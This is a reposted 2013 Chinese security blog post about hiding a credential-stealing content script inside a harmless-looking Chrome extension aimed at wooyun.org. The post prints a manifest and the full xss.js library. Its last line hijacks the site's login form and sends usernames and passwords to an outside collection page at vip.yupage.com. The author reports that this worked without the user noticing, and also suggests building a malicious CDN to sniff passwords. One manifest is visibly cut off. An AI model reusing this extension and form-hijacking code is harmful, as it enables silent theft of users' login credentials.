资源来自:http://www.2cto.com/Article/201307/225986.html
首页 > 安全 > 网站安全 > 正文
利用Chrome插件向指定页面植入js,劫持 XSS,一些猥琐的想法与实践
2013-07-08      0个评论      
收藏    我要投稿
 
 
0x00 Chrome插件
--------------------------
这个想法是昨天看到@紫梦芊 的帖子想起来的。
想法如下:
Chrome插件是可以通过manifest.json的控制,向指定页面植入contentscript.js里的脚本的。那么,能不能在一个看似正常的插件里,安放一个小功能:在所有乌云的页面里<script src=//xsser.me></script>呢?
于是,开始实践。(为了方便,只是弹了一个小框框)。
Manifest.json内容:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
{
  "name": "XiaoChaJian",
  "version": "1.0",
  "manifest_version": 2,
  "author":"VIP",
  "icons": {
      "128": "icon.png"
   },
  "permissions": [
    "tabs","http://*/*","https://*/*"
  ],
  "content_scripts": [
    {"js":["contentscript.js"],"matches": ["http://wooyun.org/*","http://*.wooyun.org/*"]}
   ]
}

contentscript.js内容:

alert(/xss/);

那么,将弹框换成xsser.me,是不是就能截获想要的cookies了呢?
很遗憾,这种方法在乌云无效,因为乌云的cookies是HTTP-ONLY的。虽然插件上也能获取http-only的cookies(像Edit this cookie和cookie快速模拟一样),但是很麻烦,于是,又有一个猥琐的想法诞生了:在乌云的登录页面中,插入@Sogili的xss.js来劫持表单,是不是就能把用户名和密码发送到我们想要的地方去了呢?
开始实践:
Manifest.json内容:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
{
  "name": "JieChiBiaoDan",
  "version": "1.0",
  "manifest_version": 2,
  
  
"author":"VIP",
  "icons": {
      "128": "icon.png"
  
  
},
  "permissions": [
    "tabs","http://*/*","https://*/*"
  ],
  
  
"content_scripts": [
    {"js":["contentscript.js"],"matches":
  
  
  
  
]
}
contentscript.js内容:
;;var xss = function(){
  var x = {
    'name':'xss.js',
    'version':'0.2.1',
    'author':'长短短(sogili)'
  };
  
  x.x=function(id){return document.getElementById(id)};
  
  //容错取值
  x.e=function(_){try{return eval('('+_+')')}catch(e){return''}};
  
  //浏览器
  x.i={
    i:!!self.ActiveXObject&&(function(){
      for(var v=6,s=document.createElement('s');
        s.innerHTML='<![if gt IE '+(v++)+']
  
><i></i><![endif]-->',
        s.getElementsByTagName('i')[0];);
      return v;
    }()),
    c:!!self.chrome,
    f:self.mozPaintCount>-1,
    o:!!self.opera,
    s:!self.chrome&&!!self.WebKitPoint
  };
  
  //UA
  x.ua = navigator.userAgent;
  
  //判断是否为苹果手持设备
  x.apple=/ip(one|ad|od)/i.test(x.ua);
  
  //随机数
  x.rdm=function(){return~~(Math.random()*1e5)};
  
  //url编码(UTF8)
  x.ec=encodeURIComponent;
  
  x.html=function(){
    return document.getElementsByTagName('html')[0]
        ||document.write('<html>')
        ||document.getElementsByTagName
  
('html')[0];
  };
  
  /*
   * 销毁一个元素
   */
  x.kill=function(e){
    e.parentElement.removeChild(e);
  };
  
  /*
   *绑定事件
   */
  x.bind=function(e,name,fn){
    e.addEventListener?e.addEventListener
  
(name,fn,false):e.attachEvent("on"+name,fn);
  };
  
  /*
   * dom准备完毕时执行函数
   */
  x.ready=function(fn){
    if(!x.i.i){
      x.bind(document,'DOMContentLoaded',fn);
    }else{
      var s = setInterval(function(){
        try{
          document.body.doScroll('left');
          clearInterval(s);
          fn();
        }catch(e){}
      },4);
    }
  }
  
  /*
   * 同源检测
   */
  x.o=function(url){
    var link = x.dom('<a href="'+encodeURI(url)+'">',1);
    return link.protocol+link.hoatname+':'+(link.port||80)
  
==location.protocol+location.hoatname+':'+(location.port||80);
  };
  
  /*
   * html to dom
   */
  x.dom=function(html,gcsec){
    var tmp = document.createElement('span');
    tmp.innerHTML=html;
    var e = tmp.children[0];
    e.style.display='none';
    x.html().appendChild(e);
    gcsec>>0>0&&setTimeout(function(){
      x.kill(e);
    },gcsec*1000);
    return e;
  };
  
  /*
   * ajax
   */
  x.ajax=function(url,params,callback){
    (params instanceof Function)&&
  
(callback=params,params=void(0));
    var XHR = (!x.o(url)&&window.XDomainRequest)||
          window.XMLHttpRequest||
          (function(){return new ActiveXObject
  
('MSXML2.XMLHTTP')});
    var xhr = new XHR();
    xhr.open(params?'post':'get',url);
    xhr.withCredentials = true;
    try{params&&xhr.setRequestHeader('content-
  
type','application/x-www-form-urlencoded');}catch(e){}
    callback&&(xhr.onreadystatechange = function() {
      (this.readyState == 4 && ((this.status >= 200
  
&& this.status <= 300) || this.status == 304))&&callback.apply
  
(this,arguments);
    });
    xhr.send(params);
  };
  
  /*
   * CSRF
   */
  x.csrf=function(url,params,callback){
    (params instanceof Function)&&
  
(callback=params,params=void(0));
    if(params){
      var form = x.dom('<form method=post>');
      form.action=url;
      for(var name in params){
        var input = document.createElement
  
('input');
        input.name=name;
        input.value=params[name];
        form.appendChild(input);
      }
      var iframe = x.dom('<iframe sandbox
  
name=_'+x.rdm()+'_>',6);
      callback&&setTimeout(function(){
        x.bind(iframe,'load',callback);
      },30);
      form.target=iframe.name;
      form.submit();
    }else{
      var img = new Image();
      callback&&(img.onerror=callback);
      img.src=url;
    }
  };
  
  /*
   * 表单劫持
   */
  x.xform=function(form,action){
  
  
form.old_action=form.action,form.old_target=form.target,form.action=act
  
ion;
    var iframe = x.dom('<iframe name=_'+x.rdm()+'_>');
    form.target=iframe.name;
    setTimeout(function(){
      x.bind(iframe,'load',function(){
  
  
form.action=form.old_action,form.target=form.old_target,form.onsubmit=n
  
ull,form.submit();
      });
    },30);
  };
  
  /*
   * 函数代理
   */
  x.proxy=function(fn,before,after){
    return function(){
      before&&before.apply(this,arguments);
      var result = fn.apply(this,arguments);
      after&&after.apply(this,arguments);
      return result;
    }
  };
  
  return x;
}();
xss.xform(document.forms[1],'http://vip.yupage.com/wy.php');//劫持表单

http://vip.yupage.com/wy.php是我做好的一个接收页面,代码如下:

开始测试,打开登录页,填好用户名密码验证码,点击登录,首先会像我的接收页发起POST,然后才会POST乌云。

再去看看,用户名密码已经躺在那里了。

在不知情的情况下,用户名和密码就这样被劫持走了。乌云的wb转账功能可是没有二次验证的哦。
0x01 CDN
---------------
现在有许许多多的网站使用了CDN来进行加速/防D等。
去搜索了下CDN的工作原理,大概是这样的。
用户访问-》自动分配最快的节点-》请求原服务器-------
返回给用户《-返回给节点服务器《-原服务器返回数据<-|
那么,能不能搭建一台恶意的CDN,然后嗅探所有使用了该CDN的网站的用户名密码呢?
 

利用Chrome插件向指定页面植入js,劫持 XSS的更多相关文章

  1. 前端性能优化之利用 Chrome Dev Tools 进行页面性能分析

    背景 我们经常使用 Chrome Dev Tools 来开发调试,但是很少知道怎么利用它来分析页面性能,这篇文章,我将详细说明怎样利用 Chrome Dev Tools 进行页面性能分析及性能报告数据 ...

  2. 利用chrome插件批量读取浏览器页面内容并写入数据库

    试想一下,如果每天要收集100页网页数据甚至更多.如果采用人工收集会吐血,用程序去收集也就成为一个不二的选择.首先肯定会想到说用java.php.C#等高级语言,但这偏偏又有个登陆和验证码,搞到无所适 ...

  3. Chrome插件触发web页面的事件

    Chrome插件中不能直接调用Web页面的元素js,原因是chrome插件的机制http://stackoverflow.com/questions/17819344/triggering-a-cli ...

  4. chrome插件访问原始页面的变量

    开发chrome插件时遇到需要获取原始网页中的一个js变量的值问题.由于content.js和原始网页的作用域环境不同,无法直接获取变量的值,提示undefined.谷歌找到大神提供的办法.综合起来记 ...

  5. Windows下利用Chrome调试IOS设备页面

    本文介绍如何在 Windows 系统中连接 iOS设备 并对 Web 页面进行真机调试 必须前提 iOS设备.数据线 Node.js 环境 Chrome 浏览器 环境准备 安装Node环境 参考Nod ...

  6. 利用Google Chrome开发插件,在网页中植入js代码

    Google Chrome是一个很强大的浏览器,提供了各种各样的插件,大大提升了使用了的效率,比如vimium.honx等. Google在提供这些插件的同时还允许用户开发自己的插件. 最近在写js的 ...

  7. Chrome插件(Extensions)开发攻略

    本文将从个人经验出发,讲述为什么需要Chrome插件,如何开发,如何调试,到哪里找资料,会遇到怎样的问题以及如何解决等,同时给出一个个人认为的比较典型的例子——获取网页内容,和服务器交互,再把信息反馈 ...

  8. 【干货】Chrome插件(扩展)开发全攻略(不点进来看看你肯定后悔)

    写在前面 我花了将近一个多月的时间断断续续写下这篇博文,并精心写下完整demo,写博客的辛苦大家懂的,所以转载务必保留出处.本文所有涉及到的大部分代码均在这个demo里面:https://github ...

  9. 【干货】Chrome插件(扩展)开发全攻略

    写在前面 我花了将近一个多月的时间断断续续写下这篇博文,并精心写下完整demo,写博客的辛苦大家懂的,所以转载务必保留出处.本文所有涉及到的大部分代码均在这个demo里面:https://github ...

随机推荐

  1. Xcode6.4注册URL Scheme步骤详解

    URL Scheme的作用 我们都知道苹果手机中的APP都有一个沙盒,APP就是一个信息孤岛,相互是不可以进行通信的.但是iOS的APP可以注册自己的URL Scheme,URL Scheme是为方便 ...

  2. sublime text2 汉化

    1.下载Sublime-Text-2中文包.zip 链接:http://pan.baidu.com/s/1mgYRW9q 密码:8ks6 2.将 Sublime-Text-2中文包.zip 解压,并将 ...

  3. Linux平台卸载MySQL总结【转】

    最近用到了mysql主从,顺手看到了这篇文章,拿出来分享一下. 转自:http://www.cnblogs.com/kerrycode/p/4364465.html 潇湘隐者 RPM包安装方式的MyS ...

  4. paas架构之docker——安装

    1. 概要 本文描述docker的安装 参考官方文档:https://docs.docker.com/engine/installation/linux/ubuntulinux/ 安装操作系统: Ub ...

  5. Java Concurrency In Practice -Chapter 2 Thread Safety

    Writing thread-safe code is managing access to state and in particular to shared, mutable state. Obj ...

  6. web前端开发教程系列-2 - 前端开发书籍分享(转)

    目录: 前言 一. CSS 二. JavaScript 三. jQuery 四. 后记   前言 前端书籍在每个商城或书架上面都是琳琅满目,很多初学者又不能很好的判断书的质量或层次.因为今天给同学们分 ...

  7. MFC 窗口分割

    动态分割窗口: BOOL CMainFrame::OnCreateClient(LPCREATESTRUCT lpcs, CCreateContext* pContext) { , , CSize(, ...

  8. R语言Cairo包的使用

    Cairo使用起来非常简单,和基础包grDevices中的函数对应. CairoPNG---grDevices:png(). CairoTIFF---grDevices:tiff(). CairoPD ...

  9. FileInputFormat

    MapReduce框架要处理数据的文件类型 FileInputFormat这个类决定. TextInputFormat是框架默认的文件类型,可以处理Text文件类型,如果你要处理的文件类型不是Text ...

  10. 非ios系统是否还有出路?

    **@SoftwareTeacher**        这位老师提出的问题我很喜欢,所以单拿出一篇文章,认真的回复.        PS: 因学校网很差,所以现在才来回复哈,见谅.以下为正文     ...